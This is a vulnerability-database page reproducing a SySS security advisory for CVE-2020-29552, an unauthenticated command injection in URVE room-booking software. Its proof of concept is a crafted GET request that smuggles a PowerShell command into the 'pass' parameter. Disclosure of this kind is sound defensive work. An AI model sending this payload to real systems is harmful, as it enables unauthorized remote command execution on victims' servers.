Vulners
Lucene search
URVE Software Build 24.03.2020 Authentication Bypass / Remote Code Execution
🗓️ 25 Dec 2020 00:00:00Reported by Erik SteltznerType 
packetstorm🔗 packetstormsecurity.com👁 494 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2020-29552 | 23 Dec 202019:25 | – | circl |
 | Urve Operating System Command Injection Vulnerability | 23 Dec 202000:00 | – | cnnvd |
 | URVE Remote Code Execution (CVE-2020-29552) | 10 Jan 202100:00 | – | checkpoint_advisories |
 | CVE-2020-29552 | 23 Dec 202015:12 | – | cve |
 | CVE-2020-29552 | 23 Dec 202015:12 | – | cvelist |
 | EUVD-2020-21918 | 7 Oct 202500:30 | – | euvd |
 | CVE-2020-29552 | 23 Dec 202016:15 | – | nvd |
 | Command injection | 23 Dec 202016:15 | – | prion |
 | PT-2020-17188 · Urve · Urve | 23 Dec 202000:00 | – | ptsecurity |
 | CVE-2020-29552 | 22 May 202515:30 | – | redhatcve |
10
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2020-040
Product: URVE Software
Manufacturer: Eveo Sp. z o.o.
Affected Version(s): Build "24.03.2020"
Tested Version(s): Build "24.03.2020"
Vulnerability Type: Missing Authentication for Critical Function
(CWE-306)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2020-11-10
Solution Date: 2020-11-18
Public Disclosure: 2020-12-23
CVE Reference: CVE-2020-29552
Authors of Advisory: Erik Steltzner, SySS GmbH
Christoph Ritter, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
URVE is a system for reserving rooms which also provides a web interface
with event scheduler.
The manufacturer describes the product as follows (see [1] and [2]):
'Booking rooms on touchscreen and easy integration with MS Exchange,
Lotus, Office 365, Google Calendar and other systems.
Great looking schedules right at the door.
Fight conference room theft with our 10" touchscreen wall-mounted
panel.'
'Manage displays, edit playlists and HTML5 content easily.
Our server can be installed on any Windows and works smoothly from
web browser.'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
With a manipulated GET request, it is possible to execute unauthenticated
system commands.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Using the following request, it is possible to execute a PowerShell
command.
_internal/pc/vpro.php?mac=0&ip=0&operation=0&usr=0&pass=0%3bpowershell+-c+
"whoami+>+C%3a\URVE\Profiles\urve\uploads\out"
The following path contains the output of the previously executed command.
/urve/uploads/out
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The passed GET parameters should be escaped.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2020-10-28: Vulnerability discovered
2020-11-10: Vulnerability reported to manufacturer
2020-11-18: Patch released by manufacturer
2020-12-23: Public disclosure of vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product Website for URVE
https://urve.co.uk/system-rezerwacji-sal
[2] Product website for URVE
https://urve.co.uk
[3] SySS Security Advisory SYSS-2020-040
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-040.txt
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Erik Steltzner and Christoph
Ritter of SySS GmbH.
E-Mail: [email protected]
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268
E-Mail: [email protected]
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Christoph_Ritter.asc
Key ID: 0x05458E666D35EAE8
Key Fingerprint: 9FB0 1B9B 2F72 3DD5 3AF3 62D8 0545 8E66 6D35 EAE8
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEZTiCFlVb++ceAX+9THl5zlMWMmgFAl/i+0kACgkQTHl5zlMW
Mmhhaw//d2l3sRso92bYcrGumrmv7ab7cOE6RRYnJ7UWRlMgFBERpE2n/ec1yi8A
cC/8xmWN9zmb5GMRI6QAkBPHLFXhNKmsukv/Rr/Zo2w8mwFRySiv5XWPJ/v331rY
EKwJVA7PF0gxcucP5fNjgzf2fkLxxX7vWvPR4up6YiXFCIRpQ8SvOSMf8S3w/CeW
fORR5QaCKHuzLRHk78oZw9Yrs3xdKbWXdu9zU9hycoHYj5oBOFHRuGG2B/Xvwuqj
g7UjLZ4QEIWP25yFs5QybsMy2psJuig8B8/E2D1oXxNgbvh/jBrT4kdvpmBDkjC3
yW+beC7iRTJ/LH/v5G66ytB6WCpUq0uBFhraBunLBbhMavIggmHvT9dRaGOswgWZ
TKoREn46HtqbNHhpToLEkJTqEf4Onv8ih+MjYCSgKXdsuxhtEvMRBod3XFb028M0
id+Q6Syu34TSLu1ArnDoDpLWcUU6tZ4r+rn+ZDOJd3Jkykdk+h0ewEpp7LfhKBFO
QpbfU1by1Xs7nz8KK7QhDVnr6KCKBRtqQnVvmUQLZLxwOjARJSjj5TptA5rUB7U1
7ZVFKad+d9v1I0bMwHc5J3XjPgNajhOSa9haFad1zMyuJ5+Zb2qETMg5griCY6nQ
RHixBPt6QJaN+rPHnavCY2gcRafQHUBYsfwok6iOk+4MXRX8SzM=
=AvxJ
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Dec 2020 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.08938